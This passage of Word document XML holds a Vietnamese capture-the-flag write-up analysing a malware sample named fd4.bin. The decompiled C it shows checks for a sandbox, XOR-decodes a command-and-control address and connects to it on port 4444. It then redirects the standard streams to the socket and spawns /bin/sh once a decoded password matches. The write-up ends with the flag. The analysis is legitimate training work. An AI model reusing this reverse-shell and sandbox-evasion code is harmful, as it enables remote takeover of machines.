        <w:t>\\/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ros,k</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>sf@y.s,s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>,ll@}jk@lk.ss@</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>{,k</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>,|k</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>+}s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>,b");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4DA2D3" w14:textId="77777777" w:rsidR="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:r>
        <w:t xml:space="preserve">  for </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>( j</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = 0</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>; ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ++</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>j )</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="306C2E61" w14:textId="77777777" w:rsidR="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:r>
        <w:t xml:space="preserve">  {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413BFBC8" w14:textId="77777777" w:rsidR="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:r>
        <w:t xml:space="preserve">    v5 = j;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3536F881" w14:textId="77777777" w:rsidR="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:r>
        <w:t xml:space="preserve">    if </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>( v</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>5 &gt;= strlen(s1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>) )</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="18E84655" w14:textId="77777777" w:rsidR="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:r>
        <w:t xml:space="preserve">      break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DED9B6" w14:textId="77777777" w:rsidR="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:r>
        <w:t xml:space="preserve">    s1[j] ^= 0x1Fu;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D52E2BF" w14:textId="77777777" w:rsidR="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:r>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD1AC19" w14:textId="77777777" w:rsidR="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>read(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>fd, buf, 0x2Eu);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C43EE1" w14:textId="77777777" w:rsidR="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>buf[strcspn(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>buf, "\n")] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AD2B0F" w14:textId="77777777" w:rsidR="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:r>
        <w:t xml:space="preserve">  if </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>( !strcmp</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(s1, buf</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>) )</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0659B8D1" w14:textId="77777777" w:rsidR="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>execve(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>"/bin/sh", nullptr, nullptr);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B13DFA6" w14:textId="77777777" w:rsidR="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  return 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3827F13B" w14:textId="0477C637" w:rsidR="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355F6CB2" w14:textId="2E6DB952" w:rsidR="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:r>
        <w:t>Phân tích</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B679330" w14:textId="77777777" w:rsidR="007C5184" w:rsidRPr="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C5184">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kiểm tra môi trường phân tích</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F869B09" w14:textId="77777777" w:rsidR="007C5184" w:rsidRPr="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:r w:rsidRPr="007C5184">
        <w:t>v14 = 0;</w:t>
      </w:r>
      <w:r w:rsidRPr="007C5184">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007C5184">
        <w:br/>
        <w:t>v3 = sysconf(85) / 1024;</w:t>
      </w:r>
      <w:r w:rsidRPr="007C5184">
        <w:br/>
        <w:t>if ( v3 * (sysconf(30) / 1024) &lt;= 999 )</w:t>
      </w:r>
      <w:r w:rsidRPr="007C5184">
        <w:br/>
        <w:t xml:space="preserve">    ++v14;</w:t>
      </w:r>
      <w:r w:rsidRPr="007C5184">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007C5184">
        <w:br/>
        <w:t>if ( sysconf(84) &lt;= 1 )</w:t>
      </w:r>
      <w:r w:rsidRPr="007C5184">
        <w:br/>
        <w:t xml:space="preserve">    ++v14;</w:t>
      </w:r>
      <w:r w:rsidRPr="007C5184">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007C5184">
        <w:br/>
        <w:t>if ( (unsigned __int64)sub_11F5(84, a2) &lt;= 0x3C )</w:t>
      </w:r>
      <w:r w:rsidRPr="007C5184">
        <w:br/>
        <w:t xml:space="preserve">    ++v14;</w:t>
      </w:r>
      <w:r w:rsidRPr="007C5184">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007C5184">
        <w:br/>
        <w:t>if ( v14 &gt; 2 )</w:t>
      </w:r>
      <w:r w:rsidRPr="007C5184">
        <w:br/>
        <w:t xml:space="preserve">    exit(1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F6992F" w14:textId="77777777" w:rsidR="007C5184" w:rsidRPr="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:r w:rsidRPr="007C5184">
        <w:t>Ba điều kiện được kiểm tra:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045F9604" w14:textId="77777777" w:rsidR="007C5184" w:rsidRPr="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007C5184">
        <w:t xml:space="preserve">RAM không quá khoảng 999 MB. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620AC755" w14:textId="77777777" w:rsidR="007C5184" w:rsidRPr="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007C5184">
        <w:t xml:space="preserve">Máy chỉ có tối đa 1 CPU. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528DE457" w14:textId="77777777" w:rsidR="007C5184" w:rsidRPr="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007C5184">
        <w:t xml:space="preserve">Thời gian hệ thống hoạt động không quá 60 giây. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287DBCFE" w14:textId="77777777" w:rsidR="007C5184" w:rsidRPr="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:r w:rsidRPr="007C5184">
        <w:t>Mỗi điều kiện đúng sẽ tăng v14. Khi cả ba đều đúng, v14 = 3 và chương trình thoát.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1333B315" w14:textId="77777777" w:rsidR="007C5184" w:rsidRPr="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C5184">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Giải mã địa chỉ C2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4169D637" w14:textId="77777777" w:rsidR="007C5184" w:rsidRPr="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:r w:rsidRPr="007C5184">
        <w:t>Ban đầu:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144BCE8E" w14:textId="77777777" w:rsidR="007C5184" w:rsidRPr="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007C5184">
        <w:t>strcpy(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007C5184">
        <w:t>s</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007C5184">
        <w:t>, "(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007C5184">
        <w:t>(1(+</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007C5184">
        <w:t>1.&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007C5184">
        <w:t>'1*-");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3FD782" w14:textId="77777777" w:rsidR="007C5184" w:rsidRPr="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:r w:rsidRPr="007C5184">
        <w:t>Sau đó từng byte được XOR với 0x1F:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3B595D" w14:textId="77777777" w:rsidR="007C5184" w:rsidRPr="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:r w:rsidRPr="007C5184">
        <w:t>s[i] ^= 0x1F;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4912E7A2" w14:textId="77777777" w:rsidR="00501760" w:rsidRPr="00501760" w:rsidRDefault="00501760" w:rsidP="00501760">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00501760">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kết nối C2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754CFBCE" w14:textId="77777777" w:rsidR="00501760" w:rsidRPr="00501760" w:rsidRDefault="00501760" w:rsidP="00501760">
      <w:r w:rsidRPr="00501760">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">fd = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00501760">
        <w:t>socket(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00501760">
        <w:t>2, 1, 0);</w:t>
      </w:r>
      <w:r w:rsidRPr="00501760">
        <w:br/>
        <w:t>addr.sa_family = 2;</w:t>
      </w:r>
      <w:r w:rsidRPr="00501760">
        <w:br/>
        <w:t xml:space="preserve">*(_WORD </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00501760">
        <w:t>*)addr.sa</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00501760">
        <w:t>_data = htons(0x115C);</w:t>
      </w:r>
      <w:r w:rsidRPr="00501760">
        <w:br/>
        <w:t xml:space="preserve">*(_DWORD </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00501760">
        <w:t>*)&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00501760">
        <w:t>addr.sa_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00501760">
        <w:t>data[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00501760">
        <w:t>2] = inet_addr(s);</w:t>
      </w:r>
      <w:r w:rsidRPr="00501760">
        <w:br/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00501760">
        <w:t>connect(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00501760">
        <w:t>fd, &amp;addr, 0x10u);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2564F264" w14:textId="77777777" w:rsidR="00501760" w:rsidRPr="00501760" w:rsidRDefault="00501760" w:rsidP="00501760">
      <w:r w:rsidRPr="00501760">
        <w:t>Các giá trị:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB3B72D" w14:textId="77777777" w:rsidR="00501760" w:rsidRPr="00501760" w:rsidRDefault="00501760" w:rsidP="00501760">
      <w:r w:rsidRPr="00501760">
        <w:t>2        = AF_INET</w:t>
      </w:r>
      <w:r w:rsidRPr="00501760">
        <w:br/>
        <w:t>1        = SOCK_STREAM</w:t>
      </w:r>
      <w:r w:rsidRPr="00501760">
        <w:br/>
        <w:t>0x115C   = 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103343D7" w14:textId="77777777" w:rsidR="00501760" w:rsidRPr="00501760" w:rsidRDefault="00501760" w:rsidP="00501760">
      <w:r w:rsidRPr="00501760">
        <w:t>Payload tạo kết nối TCP đến:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BE54DE" w14:textId="213F74B5" w:rsidR="00501760" w:rsidRDefault="00501760" w:rsidP="00501760">
      <w:r>
        <w:t>&lt;IP&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00501760">
        <w:t>:4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AEB4A8" w14:textId="77777777" w:rsidR="00501760" w:rsidRPr="00501760" w:rsidRDefault="00501760" w:rsidP="00501760">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00501760">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Chuyển socket thành terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36556FD1" w14:textId="77777777" w:rsidR="00501760" w:rsidRPr="00501760" w:rsidRDefault="00501760" w:rsidP="00501760">
      <w:r w:rsidRPr="00501760">
        <w:t>dup2(fd, 0);</w:t>
      </w:r>
      <w:r w:rsidRPr="00501760">
        <w:br/>
        <w:t>dup2(fd, 1);</w:t>
      </w:r>
      <w:r w:rsidRPr="00501760">
        <w:br/>
        <w:t>dup2(fd, 2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AF7627" w14:textId="77777777" w:rsidR="00501760" w:rsidRPr="00501760" w:rsidRDefault="00501760" w:rsidP="00501760">
      <w:r w:rsidRPr="00501760">
        <w:t>Socket được gán vào:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145465C0" w14:textId="77777777" w:rsidR="00501760" w:rsidRPr="00501760" w:rsidRDefault="00501760" w:rsidP="00501760">
      <w:r w:rsidRPr="00501760">
        <w:t>0 = stdin</w:t>
      </w:r>
      <w:r w:rsidRPr="00501760">
        <w:br/>
        <w:t>1 = stdout</w:t>
      </w:r>
      <w:r w:rsidRPr="00501760">
        <w:br/>
        <w:t>2 = stderr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D03758" w14:textId="77777777" w:rsidR="00501760" w:rsidRPr="00501760" w:rsidRDefault="00501760" w:rsidP="00501760">
      <w:r w:rsidRPr="00501760">
        <w:t>Do đó shell được tạo sau này sẽ giao tiếp trực tiếp qua kết nối C2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E7CE1C" w14:textId="079E2AFA" w:rsidR="00501760" w:rsidRPr="00501760" w:rsidRDefault="00501760" w:rsidP="00501760">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00501760">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Giải mã mật khẩu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DAE947" w14:textId="77777777" w:rsidR="00501760" w:rsidRPr="00501760" w:rsidRDefault="00501760" w:rsidP="00501760">
      <w:r w:rsidRPr="00501760">
        <w:t>Chuỗi mã hóa:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56343237" w14:textId="77777777" w:rsidR="00501760" w:rsidRPr="00501760" w:rsidRDefault="00501760" w:rsidP="00501760">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00501760">
        <w:t>strcpy(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00501760">
        <w:t>s1, "</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00501760">
        <w:t>WK]d</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00501760">
        <w:t>\\/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00501760">
        <w:t>ros,k</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00501760">
        <w:t>,</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00501760">
        <w:t>sf@y.s,s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00501760">
        <w:t>,ll@}jk@lk.ss@</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00501760">
        <w:t>{,k</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00501760">
        <w:t>,|k</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00501760">
        <w:t>+}s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00501760">
        <w:t>,b");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7757A0" w14:textId="77777777" w:rsidR="00501760" w:rsidRPr="00501760" w:rsidRDefault="00501760" w:rsidP="00501760">
      <w:r w:rsidRPr="00501760">
        <w:t>Tiếp tục XOR từng byte với 0x1F:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C696154" w14:textId="77777777" w:rsidR="00501760" w:rsidRDefault="00501760" w:rsidP="00501760">
      <w:r w:rsidRPr="00501760">
        <w:t>s1[j] ^= 0x1F;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E4DC42" w14:textId="77777777" w:rsidR="00501760" w:rsidRPr="00501760" w:rsidRDefault="00501760" w:rsidP="00501760">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00501760">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Xác thực rồi mở shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE27A2A" w14:textId="77777777" w:rsidR="00501760" w:rsidRPr="00501760" w:rsidRDefault="00501760" w:rsidP="00501760">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00501760">
        <w:t>read(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00501760">
        <w:t>fd, buf, 0x2Eu);</w:t>
      </w:r>
      <w:r w:rsidRPr="00501760">
        <w:br/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00501760">
        <w:t>buf[strcspn(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00501760">
        <w:t>buf, "\n")] = 0;</w:t>
      </w:r>
      <w:r w:rsidRPr="00501760">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00501760">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00501760">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00501760">
        <w:t>( !strcmp</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00501760">
        <w:t>(s1, buf</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00501760">
        <w:t>) )</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00501760">
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00501760">
        <w:t>execve(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00501760">
        <w:t>"/bin/sh", nullptr, nullptr);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A755ADA" w14:textId="77777777" w:rsidR="00501760" w:rsidRPr="00501760" w:rsidRDefault="00501760" w:rsidP="00501760">
      <w:r w:rsidRPr="00501760">
        <w:t xml:space="preserve">Payload đọc tối đa </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00501760">
        <w:t>46 byte</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00501760">
        <w:t xml:space="preserve"> từ C2, xóa ký tự xuống dòng rồi so sánh với chuỗi vừa giải mã.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732B1C82" w14:textId="77777777" w:rsidR="00501760" w:rsidRPr="00501760" w:rsidRDefault="00501760" w:rsidP="00501760">
      <w:r w:rsidRPr="00501760">
        <w:t>Nếu đúng, nó chạy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F193B9" w14:textId="77777777" w:rsidR="00501760" w:rsidRPr="00501760" w:rsidRDefault="00501760" w:rsidP="00501760">
      <w:r w:rsidRPr="00501760">
        <w:t>/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BCFAA5" w14:textId="77777777" w:rsidR="00501760" w:rsidRPr="00501760" w:rsidRDefault="00501760" w:rsidP="00501760">
      <w:r w:rsidRPr="00501760">
        <w:t>Vì stdin, stdout và stderr đã được chuyển sang socket nên đây là một reverse shell có mật khẩu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0667DE25" w14:textId="29718BCC" w:rsidR="00501760" w:rsidRDefault="00501760" w:rsidP="00501760">
      <w:r>
        <w:t>vậy giờ càn giải mã 2 chuỗi kia</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C75E919" w14:textId="77777777" w:rsidR="00501760" w:rsidRPr="00501760" w:rsidRDefault="00501760" w:rsidP="00501760">
      <w:r w:rsidRPr="00501760">
        <w:t>s = "((1(+</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00501760">
        <w:t>1.&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00501760">
        <w:t>'1*-"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427C3B99" w14:textId="77777777" w:rsidR="00501760" w:rsidRPr="00501760" w:rsidRDefault="00501760" w:rsidP="00501760">
      <w:r w:rsidRPr="00501760">
        <w:t>s1 = "</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00501760">
        <w:t>WK]d</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00501760">
        <w:t>\\/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00501760">
        <w:t>ros,k</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00501760">
        <w:t>,</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00501760">
        <w:t>sf@y.s,s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00501760">
        <w:t>,ll@}jk@lk.ss@</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00501760">
        <w:t>{,k</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00501760">
        <w:t>,|k</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00501760">
        <w:t>+}s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00501760">
        <w:t>,b"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33073C6B" w14:textId="77777777" w:rsidR="00501760" w:rsidRPr="00501760" w:rsidRDefault="00501760" w:rsidP="00501760">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00501760">
        <w:t>print(''.join</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00501760">
        <w:t>(chr(ord(c) ^ 0x1F) for c in s))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A59490" w14:textId="77777777" w:rsidR="00501760" w:rsidRPr="00501760" w:rsidRDefault="00501760" w:rsidP="00501760">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00501760">
        <w:t>print(''.join</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00501760">
        <w:t>(chr(ord(c) ^ 0x1F) for c in s1))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC39C44" w14:textId="10F8DA61" w:rsidR="00501760" w:rsidRDefault="00501760" w:rsidP="00501760">
      <w:r w:rsidRPr="00501760">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35DE7E9A" wp14:editId="41A84097">
            <wp:extent cx="5943600" cy="651510"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="119554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42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E5D2" w14:textId="77777777" w:rsidR="00501760" w:rsidRPr="00501760" w:rsidRDefault="00501760" w:rsidP="00501760">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00501760">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kết luận hàm main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7490A8" w14:textId="77777777" w:rsidR="00501760" w:rsidRDefault="00501760" w:rsidP="00501760">
      <w:r w:rsidRPr="00501760">
        <w:t>fd4.bin là payload reverse shell có cơ chế chống sandbox. Nó giải mã địa chỉ 77.74.198.52, kết nối đến cổng 4444, chuyển socket thành stdin/stdout/stderr và yêu cầu mật khẩu:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E82D5A2" w14:textId="757C77DD" w:rsidR="00501760" w:rsidRDefault="00501760" w:rsidP="00501760">
      <w:r w:rsidRPr="00501760">
        <w:t>HTB{C0mpl3t3ly_f1l3l3ss_but_st1ll_d3t3ct4bl3}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770E104C" w14:textId="24515E69" w:rsidR="00501760" w:rsidRPr="00501760" w:rsidRDefault="002C7479" w:rsidP="00501760">
      <w:r w:rsidRPr="002C7479">
